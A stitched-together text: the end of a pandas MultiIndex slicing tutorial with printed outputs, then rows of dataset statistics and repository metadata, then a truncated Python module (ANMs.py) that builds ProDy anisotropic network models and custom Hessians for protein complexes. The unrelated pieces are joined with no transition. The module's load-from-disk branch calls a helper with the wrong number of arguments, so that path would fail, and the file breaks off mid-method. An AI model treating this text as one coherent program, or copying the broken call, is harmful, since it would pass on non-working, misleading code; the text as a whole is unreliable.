# print(df.loc[(:, 'B1'), :])
# SyntaxError: invalid syntax
# print(df.loc[('A1':'A3', 'B2'), :])
# SyntaxError: invalid syntax
print(df.loc[(slice(None), 'B1'), :])
# val_1 val_2
# level_1 level_2 level_3
# A0 B1 C2 39 17
# C3 75 71
# A2 B1 C2 25 52
# C3 57 40
print(df.loc[(slice('A1', 'A3'), 'B2'), :])
# val_1 val_2
# level_1 level_2 level_3
# A1 B2 C0 1 89
# C1 54 60
# A3 B2 C0 64 54
# C1 27 96
print(df.loc[(slice('A1', 'A3'), ['B0', 'B2'], 'C1'), :])
# val_1 val_2
# level_1 level_2 level_3
# A1 B2 C1 54 60
# A2 B0 C1 19 4
# A3 B2 C1 27 96
print(df.loc[pd.IndexSlice[:, 'B1'], :])
# val_1 val_2
# level_1 level_2 level_3
# A0 B1 C2 39 17
# C3 75 71
# A2 B1 C2 25 52
# C3 57 40
print(df.loc[pd.IndexSlice['A1':'A3', 'B2'], :])
# val_1 val_2
# level_1 level_2 level_3
# A1 B2 C0 1 89
# C1 54 60
# A3 B2 C0 64 54
# C1 27 96
print(df.loc[pd.IndexSlice['A1':'A3', ['B0', 'B2'], 'C1'], :])
# val_1 val_2
# level_1 level_2 level_3
# A1 B2 C1 54 60
# A2 B0 C1 19 4
# A3 B2 C1 27 96
print(df.xs('B1', level='level_2'))
# val_1 val_2
# level_1 level_3
# A0 C2 39 17
# C3 75 71
# A2 C2 25 52
# C3 57 40
print(df.xs('C1', level=2))
# val_1 val_2
# level_1 level_2
# A0 B0 44 9
# A1 B2 54 60
# A2 B0 19 4
# A3 B2 27 96
print(df.xs(['B1', 'C2'], level=['level_2', 'level_3']))
# val_1 val_2
# level_1
# A0 39 17
# A2 25 52
print(df.xs(pd.IndexSlice['A1':'A3'], level='level_1'))
# val_1 val_2
# level_2 level_3
# B2 C0 1 89
# C1 54 60
# B3 C2 47 6
# C3 16 5
# B0 C0 75 22
# C1 19 4
# B1 C2 25 52
# C3 57 40
# B2 C0 64 54
# C1 27 96
# B3 C2 100 77
# C3 22 50
print(df.xs(slice('A1', 'A3'), level='level_1'))
# val_1 val_2
# level_2 level_3
# B2 C0 1 89
# C1 54 60
# B3 C2 47 6
# C3 16 5
# B0 C0 75 22
# C1 19 4
# B1 C2 25 52
# C3 57 40
# B2 C0 64 54
# C1 27 96
# B3 C2 100 77
# C3 22 50
# print(df.xs(['B1', 'B2'], level='level_2'))
# KeyError: ('B1', 'B2')
print(df.loc[pd.IndexSlice[:, ['B1', 'B2']], :])
# val_1 val_2
# level_1 level_2 level_3
# A0 B1 C2 39 17
# C3 75 71
# A1 B2 C0 1 89
# C1 54 60
# A2 B1 C2 25 52
# C3 57 40
# A3 B2 C0 64 54
# C1 27 96
df.loc[(['A0', 'A1'], ['B0', 'B3']), :] = -100
print(df)
# val_1 val_2
# level_1 level_2 level_3
# A0 B0 C0 -100 -100
# C1 -100 -100
# B1 C2 39 17
# C3 75 71
# A1 B2 C0 1 89
# C1 54 60
# B3 C2 -100 -100
# C3 -100 -100
# A2 B0 C0 75 22
# C1 19 4
# B1 C2 25 52
# C3 57 40
# A3 B2 C0 64 54
# C1 27 96
# B3 C2 100 77
# C3 22 50
df.loc[(['A0', 'A1'], ['B0', 'B3']), :] = [-200, -300]
print(df)
# val_1 val_2
# level_1 level_2 level_3
# A0 B0 C0 -200 -300
# C1 -200 -300
# B1 C2 39 17
# C3 75 71
# A1 B2 C0 1 89
# C1 54 60
# B3 C2 -200 -300
# C3 -200 -300
# A2 B0 C0 75 22
# C1 19 4
# B1 C2 25 52
# C3 57 40
# A3 B2 C0 64 54
# C1 27 96
# B3 C2 100 77
# C3 22 50
df.loc[(['A0', 'A1'], ['B0', 'B3']), :] = [[-1, -2], [-3, -4], [-5, -6], [-7, -8]]
print(df)
# val_1 val_2
# level_1 level_2 level_3
# A0 B0 C0 -1 -2
# C1 -3 -4
# B1 C2 39 17
# C3 75 71
# A1 B2 C0 1 89
# C1 54 60
# B3 C2 -5 -6
# C3 -7 -8
# A2 B0 C0 75 22
# C1 19 4
# B1 C2 25 52
# C3 57 40
# A3 B2 C0 64 54
# C1 27 96
# B3 C2 100 77
# C3 22 50
# df.xs(['B1', 'C2'], level=['level_2', 'level_3']) = 0
# SyntaxError: can't assign to function call
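# Assignment to the result of a function call is a SyntaxError; to set values on those
# rows in place, index with loc and pd.IndexSlice instead (a sketch continuing from df above):
df.loc[pd.IndexSlice[:, 'B1', 'C2'], :] = 0
# Both matching rows, (A0, B1, C2) and (A2, B1, C2), now hold 0 in val_1 and val_2.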
| 33.584775
| 171
| 0.286833
| 1,151
| 9,706
| 2.314509
| 0.074718
| 0.099099
| 0.060435
| 0.066066
| 0.838964
| 0.838213
| 0.752252
| 0.731231
| 0.712838
| 0.676051
| 0
| 0.32627
| 0.62075
| 9,706
| 288
| 172
| 33.701389
| 0.397446
| 0.829796
| 0
| 0.133333
| 0
| 0
| 0.126429
| 0.017857
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.033333
| 0
| 0.033333
| 0.833333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 11
|
e8f41406cd05cfd60f730812638a362bc9a38230
| 131,770
|
py
|
Python
|
Software/ANMs.py
|
hrch3n/cNMA
|
32bfffc707487fa0964543d17b1fe89f089e09d5
|
[
"MIT"
] | 3
|
2021-02-09T02:32:33.000Z
|
2021-09-14T22:18:26.000Z
|
Software/ANMs.py
|
hrch3n/cNMA
|
32bfffc707487fa0964543d17b1fe89f089e09d5
|
[
"MIT"
] | 1
|
2018-03-09T19:28:42.000Z
|
2018-03-30T20:08:50.000Z
|
Software/ANMs.py
|
hrch3n/cNMA
|
32bfffc707487fa0964543d17b1fe89f089e09d5
|
[
"MIT"
] | 6
|
2018-12-05T14:49:26.000Z
|
2019-11-07T03:44:18.000Z
|
'''
Created on Jan 17, 2014
@author: oliwa
'''
import sys as sys
import numpy as np
from prody.dynamics.anm import calcANM, ANM
from prody.dynamics.editing import extendModel, sliceModel
from prody.dynamics.functions import saveModel, loadModel, writeArray
from prody.proteins.pdbfile import writePDB, parsePDB
from prody.dynamics.mode import Vector
from prody.measure.measure import calcCenter, calcDistance
from prody.dynamics.compare import calcOverlap, calcCumulOverlap,\
calcSubspaceOverlap, calcCovOverlap, printOverlapTable, getOverlapTable
from prody.apps.prody_apps.prody_contacts import prody_contacts
import traceback
from prody.dynamics.nmdfile import writeNMD
import scipy as sp
class ANMs(object):
"""
This class holds all the ANMs for an encounter.
"""
def __init__(self, utils):
"""
Constructor
"""
self.utils = utils
def createSlcSelectionString(self, reference, isBoundComplex, ref_chain, referenceTitle):
""" Under the assumption that is reflected in the Benchmark 4.0 that the receptor atoms are set before the
ligand atoms (spacially in the PDB file), if the current protein under investigation is a ligand,
an offset is added to the selection string to match the atoms of the ligand from the complex. """
if isBoundComplex and not self.utils.isReceptor(referenceTitle):
print "adding offset"
return self.utils.addOffset(ref_chain.getSelstr(), reference.select('segment "R."').numAtoms())
else:
print "using original selstr"
return ref_chain.getSelstr()
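# Hypothetical illustration only (not the author's utils.addOffset): the idea of shifting an
# index-based ProDy selection string such as "index 0 to 1199" by the number of receptor
# atoms, so that it addresses the ligand atoms inside the combined complex:
# import re
# def _shift_index_selstr_sketch(selstr, offset):
#     return re.sub(r"\d+", lambda m: str(int(m.group()) + offset), selstr)
# # _shift_index_selstr_sketch("index 0 to 1199", 3000) -> "index 3000 to 4199"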
def calcANMs(self, reference, ref_chain, numberOfModes, encounter, selstr='calpha', whatAtomsToMatch='calpha', modified="", forceRebuild=False, isBoundComplex=False):
# if the base model does not exist, it needs to be created along with the
# extended and slicedback models
if forceRebuild or not self.doesANMExist(reference, numberOfModes, selstr, whatAtomsToMatch, modified):
# Create the anm
anm = calcANM(reference, n_modes=numberOfModes, selstr=selstr)
# First extend the anm on all atoms
anm_extend = extendModel(anm[0], anm[1], reference, norm=True)
# Then slice it back to matched
selectionAtoms = self.createSlcSelectionString(reference, isBoundComplex, ref_chain, encounter.getReference().getTitle())
anm_slc = sliceModel(anm_extend[0], anm_extend[1], selectionAtoms)
# If isBoundComplex, slice one anm back to its overall matched chains
if isBoundComplex:
selectionAtomsCounterpart = self.createSlcSelectionString(reference, isBoundComplex, encounter.getBoundCounterpartChain(), encounter.getUnboundCounterpart().getTitle())
anm_slc_counterpart = sliceModel(anm_extend[0], anm_extend[1], selectionAtomsCounterpart)
# Save the models
# saveModel(anm[0],
# filename=self.getANMPath(reference, numberOfModes, selstr, whatAtomsToMatch),
# matrices=True)
# saveModel(anm_extend[0],
# filename=self.getANMPath(reference, numberOfModes, selstr, whatAtomsToMatch, modified="extended"),
# matrices=True
# )
# saveModel(anm_slc[0],
# filename=self.getANMPath(reference, numberOfModes, selstr, whatAtomsToMatch, modified="slicedback"),
# matrices=True
# )
print "created and saved models"
# print "reference, it is the complex: ", reference.select('calpha and segment "R."').numAtoms()
# print "to slice on, it is the mob_chain: ", ref_chain.numAtoms()
print "anm hessian : " + str(anm[0].getHessian().shape)
print "number of calpha : " + str(reference.select('calpha').numAtoms())
print "anm size : " + str(anm[0].getArray().shape)
print "anm_ext size : " + str(anm_extend[0].getArray().shape)
print "anm_slice size : " + str(anm_slc[0].getArray().shape)
print "selectionAtoms : " + selectionAtoms
if isBoundComplex:
print "anm slice counterpart size: " + str(anm_slc_counterpart[0].getArray().shape)
print "selectionAtoms counterpart: " + selectionAtomsCounterpart
# Save the models"
self._anm = anm
self._anm_extend = anm_extend
self._anm_slc = anm_slc
if isBoundComplex:
self._anm_slc_counterpart = anm_slc_counterpart
else:
#raise Exception("Problem with capturing the selection of saved models, do not use load models from files now.")
try:
# load models
anmModel = loadModel(self.getANMPath(reference, numberOfModes, selstr, whatAtomsToMatch)+".anm.npz")
anm_extendModel = loadModel(self.getANMPath(reference, numberOfModes, selstr, whatAtomsToMatch, modified="extended")+".nma.npz")
anm_slcModel = loadModel(self.getANMPath(reference, numberOfModes, selstr, whatAtomsToMatch, modified="slicedback")+".nma.npz")
# store models selections
anmModelSelection = reference.select(selstr)
anm_extendModelSelection = reference
selectionAtoms = self.createSlcSelectionString(reference, isBoundComplex, ref_chain)
anm_slcModelSelection = reference.select(selectionAtoms)
# recombine models and selections as tuples
anm = (anmModel, anmModelSelection)
anm_extend = (anm_extendModel, anm_extendModelSelection)
anm_slc = (anm_slcModel, anm_slcModelSelection)
print "loaded models"
print "anm size : " + str(anm[0].getArray().shape)
print "anm_ext size : " + str(anm_extend[0].getArray().shape)
print "anm_slice size: " + str(anm_slc[0].getArray().shape)
print "selectionAtoms: " + selectionAtoms
self._anm = anm
self._anm_extend = anm_extend
self._anm_slc = anm_slc
except IOError as e:
print "Error loading ANM models from disc: "+str(e)
def calcANMsForPart2a2k(self, reference, counterpart, proteinComplex, ref_chain, counterpart_chain, chain_complex, numberOfModes, selstr='calpha', whatAtomsToMatch='calpha'):
# Create the anm of reference, counterpart and proteinComplex)
# print "reference, counterpart, proteinComplex, chain_complex (calphas, calphas*3-6) : ", (reference.select('calpha').numAtoms(), reference.select('calpha').numAtoms()*3 -6), (counterpart.select('calpha').numAtoms(), counterpart.select('calpha').numAtoms()*3-6), (proteinComplex.select('calpha').numAtoms(), proteinComplex.select('calpha').numAtoms()*3-6), (chain_complex.select('calpha').numAtoms(), chain_complex.select('calpha').numAtoms()*3 -6)
# print "anm_reference, anm_counterpart, anm_complex hessian shapes : ", anm_reference[0].getHessian().shape, anm_counterpart[0].getHessian().shape, anm_complex[0].getHessian().shape
# print "anm_reference, anm_counterpart, anm_complex, anm_complex_slc getArray() shapes : ", anm_reference[0].getArray().shape, anm_counterpart[0].getArray().shape, anm_complex[0].getArray().shape, anm_complex_slc[0].getArray().shape
self._anm_reference, self._anm_reference_slc = self._calcANMsUnified(reference, ref_chain, numberOfModes/2, selstr, whatAtomsToMatch)
self._anm_counterpart, self._anm_counterpart_slc = self._calcANMsUnified(counterpart, counterpart_chain, numberOfModes/2, selstr, whatAtomsToMatch)
# print "15 ang contact before moving atoms:", proteinComplex.select('same residue as exwithin 15 of segment "L." ').numAtoms()
# self._moveSegment(proteinComplex, "L", 30)
# if proteinComplex.select('same residue as exwithin 15 of segment "L." ') != None:
# print "15 ang contact after moving atoms: ", proteinComplex.select('same residue as exwithin 15 of segment "L." ').numAtoms()
# else:
# print "15 ang contact after moving atoms: 0"
self._anm_complex, self._anm_complex_slc = self._calcANMsUnified(proteinComplex, chain_complex, numberOfModes, selstr, whatAtomsToMatch)
#self.utils.testHessianSubMatrices(self._anm_reference, self._anm_counterpart, self._anm_complex)
# check blockmatrix differences and pymol output
# useRelError = True
#significantDifferences = self.utils.testBlockMatrixMembership(self._anm_reference[0].getHessian(), self._anm_counterpart[0].getHessian(), self._anm_complex[0].getHessian(), useRelativeError=useRelError)
#self.utils.whichPatternsAreAffectedbySignificantDifferences(significantDifferences)
# assert reference.getResnums()[0] == proteinComplex.getResnums()[0]
#print self.utils.significantDifferencesToPymolResiduesString(significantDifferences, reference.getResnums()[0])
print "anm_reference_slc, anm_counterpart_slc, anm_complex_slc getArray() shapes : ", self._anm_reference_slc[0].getArray().shape, self._anm_counterpart_slc[0].getArray().shape, self._anm_complex_slc[0].getArray().shape
def calcANMsUnified(self, reference, counterpart, proteinComplex, numberOfModes, encounter, ref_chain = None, counterpart_chain = None, chain_complex = None, selstr='calpha', whatAtomsToMatch='calpha',):
""" Calculate the ANMs for the NMA. If examinations on the complex, it is assumed (for now) that the reference protein is the receptor. """
if (ref_chain == None) and (counterpart_chain == None) and (chain_complex == None):
self.bound_provided = False
else:
self.bound_provided = True
if self.utils.config.investigationsOn == "Individual" or self.utils.config.investigationsOn == "Complex" :
assert self.utils.config.whichCustomHIndividual == "HC_subvector" or self.utils.config.whichCustomHIndividual == "submatrix" or self.utils.config.whichCustomHIndividual == "canonical"
numberOfModesComplex = min((proteinComplex.select('calpha').numAtoms()*3 - 6), self.utils.config.maxModesToCalculate)
if ref_chain != None:
self._anm_reference, self._anm_reference_slc = self._calcANMsUnified(reference, numberOfModes, selstr, whatAtomsToMatch, ref_chain)
else:
self._anm_reference, self._anm_reference_slc = self._calcANMsUnified(reference, numberOfModes, selstr, whatAtomsToMatch)
self._anm_counterpart = calcANM(counterpart, n_modes = numberOfModes, selstr = selstr, zeros = True)
if chain_complex != None:
self._anm_complex, self._anm_complex_slc = self._calcANMsUnified(proteinComplex, numberOfModesComplex, selstr, whatAtomsToMatch, chain_complex)
else:
self._anm_complex, self._anm_complex_slc = self._calcANMsUnified(proteinComplex, numberOfModesComplex, selstr, whatAtomsToMatch)
# elif self.utils.config.investigationsOn == "Complex":
# numberOfModesComplex = numberOfModes*2
# self._anm_reference, self._anm_reference_slc = self._calcANMsUnified(reference, numberOfModes, selstr, whatAtomsToMatch, ref_chain)
# self._anm_counterpart, self._anm_counterpart_slc = self._calcANMsUnified(counterpart, numberOfModes, selstr, whatAtomsToMatch, counterpart_chain)
# self._anm_complex, self._anm_complex_slc = self._calcANMsUnified(proteinComplex, numberOfModesComplex, selstr, whatAtomsToMatch, chain_complex)
print "anm_reference anm_counterpart, anm_complex getArray() shapes : ", self._anm_reference[0].getArray().shape, self._anm_counterpart[0].getArray().shape, self._anm_complex[0].getArray().shape
print "anm_reference_slc, anm_complex_slc getArray() shapes : ", self._anm_reference_slc[0].getArray().shape, self._anm_complex_slc[0].getArray().shape
# create custom H via U1
if self.utils.config.customH:
HC = self._anm_complex[0].getHessian()
if self.utils.isReceptor(reference.getTitle()):
HR = self._anm_reference[0].getHessian()
HL = self._anm_counterpart[0].getHessian()
else:
HR = self._anm_counterpart[0].getHessian()
HL = self._anm_reference[0].getHessian()
HRtilde = HC[:HR.shape[0], :HR.shape[1]]
HLtilde = HC[HR.shape[0]:HR.shape[0]+HL.shape[0], HR.shape[1]:HR.shape[1]+HL.shape[1]]
assert HR.shape == HRtilde.shape
assert HL.shape == HLtilde.shape
# for now assert that reference is always the receptor
if self.utils.config.investigationsOn == "Complex":
assert self.utils.isReceptor(reference.getTitle())
HCcustomBuild = np.zeros((HC.shape[0], HC.shape[1]))
if self.utils.isReceptor(reference.getTitle()):
if self.utils.config.whichCustomHC == "HC_U1" or self.utils.config.whichCustomHC == "HC_U1_1k1k":
HRtildeH_ANew, interCalphaIndicesHR = self.calcCustomH_ANew(HR.copy(), encounter.getReference(), encounter.getUnboundCounterpart(), encounter, "C_u", "r_ij", True, selstr)
HLtildeH_ANew, interCalphaIndicesHL = self.calcCustomH_ANew(HL.copy(), encounter.getUnboundCounterpart(), encounter.getReference(), encounter, "C_u", "r_ij", False, selstr)
HRL_new = self.calcCustomH_ANew_IJ(encounter.getReference(), encounter.getUnboundCounterpart(), encounter, False, "r_ij", True, selstr)
elif self.utils.config.whichCustomHC == "HC_0" or self.utils.config.whichCustomHC == "HC_06":
HRtildeH_ANew = HR.copy()
HLtildeH_ANew = HL.copy()
HRL_new = np.zeros(((reference.select('calpha').numAtoms()*3), (counterpart.select('calpha').numAtoms()*3) ))
interCalphaIndicesHR = None
interCalphaIndicesHL = None
print "reference is receptor, shapes of HRtilde, HLtilde, HRL: ", HRtildeH_ANew.shape, HLtildeH_ANew.shape, HRL_new.shape
else:
if self.utils.config.whichCustomHC == "HC_U1":
HRtildeH_ANew, interCalphaIndicesHR = self.calcCustomH_ANew(HR.copy(), encounter.getUnboundCounterpart(), encounter.getReference(), encounter, "C_u", "r_ij", False, selstr)
HLtildeH_ANew, interCalphaIndicesHL = self.calcCustomH_ANew(HL.copy(), encounter.getReference(), encounter.getUnboundCounterpart(), encounter, "C_u", "r_ij", True, selstr)
HRL_new = self.calcCustomH_ANew_IJ(encounter.getUnboundCounterpart(), encounter.getReference(), encounter, False, "r_ij", False, selstr)
print "reference is ligand, shapes of HLtilde, HRtilde, HRL: ", HLtildeH_ANew.shape, HRtildeH_ANew.shape, HRL_new.shape
# put the new HRtilde and HLtilde inside HC
HCcustomBuild[:HR.shape[0], :HR.shape[1]] = HRtildeH_ANew
HCcustomBuild[HR.shape[0]:HR.shape[0]+HL.shape[0], HR.shape[1]:HR.shape[1]+HL.shape[1]] = HLtildeH_ANew
HCcustomBuild[0:HR.shape[0], HR.shape[1]:HR.shape[1]+HL.shape[1]] = HRL_new
HCcustomBuild[HR.shape[0]:HR.shape[0]+HL.shape[0], 0:HR.shape[1]] = HRL_new.T
# optional assertion to test if HCcustomBuild equals the original HC if k = 1 and d = 15 (default ProDy settings)
if (self.utils.config.whichCustomHC == "HC_U1" and self.utils.config.customHRdistance == 15 and self.utils.config.customForceConstant == 1.0):
# assert np.allclose(HC, HCcustomBuild) # assert this if k = 1, A = 15
print "not asserting HCcustomBuild equals original HC with k1 A15"
# Projection
# def projectHessian(self, hessian, reference, proteinComplex, referenceSegment, projectionStyle, projectOnlyReferencePartOfHC=False, interCalphaIndices=None):
if self.utils.config.projectHessian:
if self.utils.config.investigationsOn == "Individual" or self.utils.config.investigationsOn == "Complex":
if self.utils.isReceptor(reference.getTitle()):
if self.utils.config.whichCustomHC == "HC_U1":
if self.utils.config.projectionStyle == "full" or self.utils.config.projectionStyle == "intra":
if self.utils.config.whichCustomHIndividual == "HC_subvector":
HCcustomBuild = self.projectHessian(HCcustomBuild.copy(), reference, proteinComplex, "R", self.utils.config.projectionStyle, True, interCalphaIndicesHR)
#HCcustomBuild = self.projectHessian(HCcustomBuild.copy(), proteinComplex, proteinComplex, '', self.utils.config.projectionStyle, False, interCalphaIndicesHR)
elif self.utils.config.whichCustomHIndividual == "submatrix":
HRtildeH_ANew = self.projectHessian(HRtildeH_ANew.copy(), reference, proteinComplex, "R", self.utils.config.projectionStyle, False, interCalphaIndicesHR)
elif self.utils.config.projectionStyle == "fixedDomainFrame":
HCcustomBuild = self.transformHessianToFixedDomainFrame(HCcustomBuild.copy(), reference, proteinComplex, "R", self.utils.config.projectionStyle)
# else reference is the ligand
else:
if self.utils.config.whichCustomHC == "HC_U1":
if self.utils.config.projectionStyle == "full" or self.utils.config.projectionStyle == "intra":
if self.utils.config.whichCustomHIndividual == "HC_subvector":
HCcustomBuild = self.projectHessian(HCcustomBuild.copy(), reference, proteinComplex, "L", self.utils.config.projectionStyle, True, interCalphaIndicesHL)
#HCcustomBuild = self.projectHessian(HCcustomBuild.copy(), proteinComplex, proteinComplex, '', self.utils.config.projectionStyle, False, interCalphaIndicesHL)
elif self.utils.config.whichCustomHIndividual == "submatrix":
HLtildeH_ANew = self.projectHessian(HLtildeH_ANew.copy(), reference, proteinComplex, "L", self.utils.config.projectionStyle, False, interCalphaIndicesHL)
elif self.utils.config.projectionStyle == "fixedDomainFrame":
HCcustomBuild = self.transformHessianToFixedDomainFrame(HCcustomBuild.copy(), reference, proteinComplex, "L", self.utils.config.projectionStyle)
elif self.utils.config.investigationsOn == "Complex":
# project out the rigid body motions of the receptor. if the goal is to project the whole complex, do: HCcustomBuild = self.projectHessian(HCcustomBuild, proteinComplex, proteinComplex, '')
if self.utils.config.projectionStyle == "full" or self.utils.config.projectionStyle == "intra":
HCcustomBuild = self.projectHessian(HCcustomBuild.copy(), reference, proteinComplex, "R", self.utils.config.projectionStyle, True, interCalphaIndicesHR)
elif self.utils.config.projectionStyle == "fullComplex":
HCcustomBuild = self.projectHessian(HCcustomBuild.copy(), proteinComplex, proteinComplex, '', self.utils.config.projectionStyle)
elif self.utils.config.projectionStyle == "fixedDomainFrame":
HCcustomBuild = self.transformHessianToFixedDomainFrame(HCcustomBuild.copy(), reference, proteinComplex, "R", self.utils.config.projectionStyle)
else:
raise Exception('unknown projection style')
if self.utils.config.investigationsOn == "Complex" or self.utils.config.whichCustomHIndividual == "HC_subvector":
# Create the custom complex ANM
self._anm_complex_tilde = ANM(self._anm_complex[0].getTitle()+"_"+self.utils.config.whichCustomHC)
self._anm_complex_tilde.setHessian(HCcustomBuild)
if self.utils.config.calculateZeroEigvalModes:
if self.utils.config.whichCustomHC == "HC_0" or self.utils.config.whichCustomHC == "HC_06":
numberOfModesComplex += 6
self._anm_complex_tilde.calcModes(n_modes=numberOfModesComplex, zeros=True)
else:
self._anm_complex_tilde.calcModes(n_modes=numberOfModesComplex)
# Extend the self._anm_reference_tilde on all atoms
anm_complex_tilde_extend = extendModel(self._anm_complex_tilde, self._anm_complex[1], proteinComplex, norm=True)
# Then slice the anm_complex to the matched atoms
self._anm_complex_tilde_slc = sliceModel(anm_complex_tilde_extend[0], anm_complex_tilde_extend[1], selstr)
# Normalize the modes of the sliced anm
self._anm_complex_tilde_slc = self.getNormalizedANM(self._anm_complex_tilde_slc)
# Replace the complex anm and the complex_slc anm with the modified ANMs
print "Replacing ANM H with ANM Htilde for the complex"
self._anm_complex = (self._anm_complex_tilde, self._anm_complex[1])
self._anm_complex_slc = self._anm_complex_tilde_slc
# modify HR to have the sliced part of HC_tilde
if self.utils.config.investigationsOn == "Individual" or self.utils.config.investigationsOn == "Complex":
if self.utils.config.whichCustomHIndividual == "HC_subvector":
Marray = self.utils.sliceComplexModestoMatchProtein(self._anm_complex[0].getArray(), reference, encounter.getReferenceSegment())
self._anm_reference_tilde = ANM(self._anm_reference[0].getTitle()+"_"+self.utils.config.whichCustomHC)
self._anm_reference_tilde.setEigens(Marray, self._anm_complex[0].getEigvals())
self._anm_reference_tilde = (self._anm_reference_tilde, self._anm_reference[1])
self._anm_reference_tilde = self.getNormalizedANM(self._anm_reference_tilde)
# submatrix, take the new HRtilde/HLtilde, re-calculate its modes and replace the previous ANM
elif self.utils.config.whichCustomHIndividual == "submatrix":
if self.utils.isReceptor(reference.getTitle()):
submatrix = HRtildeH_ANew
else:
submatrix = HLtildeH_ANew
self._anm_reference_tilde = ANM(self._anm_reference[0].getTitle()+"_"+self.utils.config.whichCustomHC)
self._anm_reference_tilde.setHessian(submatrix)
if self.utils.config.calculateZeroEigvalModes:
self._anm_reference_tilde.calcModes(n_modes=numberOfModes, zeros=True)
else:
self._anm_reference_tilde.calcModes(n_modes=numberOfModes)
self._anm_reference_tilde = (self._anm_reference_tilde, self._anm_reference[1])
# Extend the self._anm_reference_tilde on all atoms
anm_reference_tilde_extend = extendModel(self._anm_reference_tilde[0], self._anm_reference[1], reference, norm=True)
# Then slice the anm_reference to the matched
self._anm_reference_tilde_slc = sliceModel(anm_reference_tilde_extend[0], anm_reference_tilde_extend[1], selstr)
self._anm_reference_tilde_slc = self.getNormalizedANM(self._anm_reference_tilde_slc)
# Replace reference and reference_slc with the modified ANMs
print "Replacing ANM H with ANM Htilde for the reference"
self._anm_reference = self._anm_reference_tilde
self._anm_reference_slc = self._anm_reference_tilde_slc
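# The manual block assembly of HCcustomBuild above (HRtilde and HLtilde on the diagonal,
# HRL and its transpose off the diagonal) could equivalently be written with numpy's
# block helper; a commented sketch assuming the same shapes as above:
# HCcustomBuild = np.block([[HRtildeH_ANew, HRL_new],
#                           [HRL_new.T, HLtildeH_ANew]])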
def calcANMsForPart2b2k(self, reference, counterpart, proteinComplex, ref_chain, counterpart_chain, chain_complex, numberOfModes, encounter, selstr='calpha', whatAtomsToMatch='calpha'):
""" Unbound complex to bound complex NMA, it is assumed that the reference is the receptor and is the first object in the complex pdb file
This method creates self.* NMA objects
Args:
reference: the receptor protein
counterpart: the ligand protein
proteinComplex: the protein complex
ref_chain: the matched part of the reference
counterpart_chain: the matched part of the counterpart
chain_complex: the matched part on the complex
numberOfModes: the 2k number of modes
encounter: object aggregating proteins
selstr: the selection string for the NMA; the coarse-grained default is calpha
"""
# Create the anm of reference, counterpart and proteinComplex)
self._anm_reference, self._anm_reference_slc = self._calcANMsUnified(reference, ref_chain, numberOfModes/2, selstr, whatAtomsToMatch)
self._anm_counterpart, self._anm_counterpart_slc = self._calcANMsUnified(counterpart, counterpart_chain, numberOfModes/2, selstr, whatAtomsToMatch)
self._anm_complex, self._anm_complex_slc = self._calcANMsUnified(proteinComplex, chain_complex, numberOfModes, selstr, whatAtomsToMatch)
print "anm_reference anm_counterpart, anm_complex getArray() shapes : ", self._anm_reference[0].getArray().shape, self._anm_counterpart[0].getArray().shape, self._anm_complex[0].getArray().shape
print "anm_reference_slc, anm_counterpart_slc, anm_complex_slc getArray() shapes : ", self._anm_reference_slc[0].getArray().shape, self._anm_counterpart_slc[0].getArray().shape, self._anm_complex_slc[0].getArray().shape
# modify the hessians
if self.utils.config.customH:
HC = self._anm_complex[0].getHessian()
if self.utils.isReceptor(reference.getTitle()):
HR = self._anm_reference[0].getHessian()
HL = self._anm_counterpart[0].getHessian()
else:
HR = self._anm_counterpart[0].getHessian()
HL = self._anm_reference[0].getHessian()
HRtilde = HC[:HR.shape[0], :HR.shape[1]]
HLtilde = HC[HR.shape[0]:HR.shape[0]+HL.shape[0], HR.shape[1]:HR.shape[1]+HL.shape[1]]
assert HR.shape == HRtilde.shape
assert HL.shape == HLtilde.shape
# for now assert that reference is always the receptor, in case of complex investigation
assert self.utils.isReceptor(reference.getTitle())
HCcustomBuild = np.zeros((HC.shape[0], HC.shape[1]))
if self.utils.config.whichCustomHC == "HC_U1":
# create the complex hessian with interactions on the off diagonal using U1
print "HC_U1"
HRtildeH_ANew = self.calcCustomH_ANew(HR.copy(), encounter.getReference(), encounter.getUnboundCounterpart(), encounter, "C_u", "r_ij", True, selstr)
HLtildeH_ANew = self.calcCustomH_ANew(HL.copy(), encounter.getUnboundCounterpart(), encounter.getReference(), encounter, "C_u", "r_ij", False, selstr)
HRL_new = self.calcCustomH_ANew_IJ(encounter.getReference(), encounter.getUnboundCounterpart(), encounter, False, "r_ij", True, selstr)
elif self.utils.config.whichCustomHC == "HC_0" or self.utils.config.whichCustomHC == "HC_06":
# create the hessian by just using canonical HR and HL and offmatrices zero
print "HC_0 or HC_06"
HRtildeH_ANew = HR.copy()
HLtildeH_ANew = HL.copy()
HRL_new = np.zeros(((reference.select('calpha').numAtoms()*3), (counterpart.select('calpha').numAtoms()*3) ))
print "reference is receptor, shapes of HRtilde, HLtilde, HRL: ", HRtildeH_ANew.shape, HLtildeH_ANew.shape, HRL_new.shape
print "finished projecting H, anm_reference_tilde calc modes"
# put the new HRtilde and HLtilde inside HC
HCcustomBuild[:HR.shape[0], :HR.shape[1]] = HRtildeH_ANew
HCcustomBuild[HR.shape[0]:HR.shape[0]+HL.shape[0], HR.shape[1]:HR.shape[1]+HL.shape[1]] = HLtildeH_ANew
HCcustomBuild[0:HR.shape[0], HR.shape[1]:HR.shape[1]+HL.shape[1]] = HRL_new
HCcustomBuild[HR.shape[0]:HR.shape[0]+HL.shape[0], 0:HR.shape[1]] = HRL_new.T
#if self.utils.config.whichCustomHC == "HC_U1":
# assert np.allclose(HC, HCcustomBuild) # assert this if k = 1, A = 15
# print "asserted HC with k1 A 15"
if self.utils.config.projectHessian:
HCcustomBuild = self.projectHessian(HCcustomBuild, proteinComplex, proteinComplex, '')
# make HC anm
self._anm_complex_tilde = ANM(self._anm_complex[0].getTitle()+"_"+self.utils.config.whichCustomHC)
self._anm_complex_tilde.setHessian(HCcustomBuild)
self._anm_complex_tilde.calcModes(n_modes=numberOfModes)
# Extend the self._anm_reference_tilde on all atoms
anm_complex_tilde_extend = extendModel(self._anm_complex_tilde, self._anm_complex[1], proteinComplex, norm=True)
# Then slice the anm_complex to the matched atoms
self._anm_complex_tilde_slc = sliceModel(anm_complex_tilde_extend[0], anm_complex_tilde_extend[1], chain_complex.getSelstr())
# Replace the complex anm and the complex_slc anm with the modified ANMs
print "Replacing ANM H with ANM Htilde for the complex"
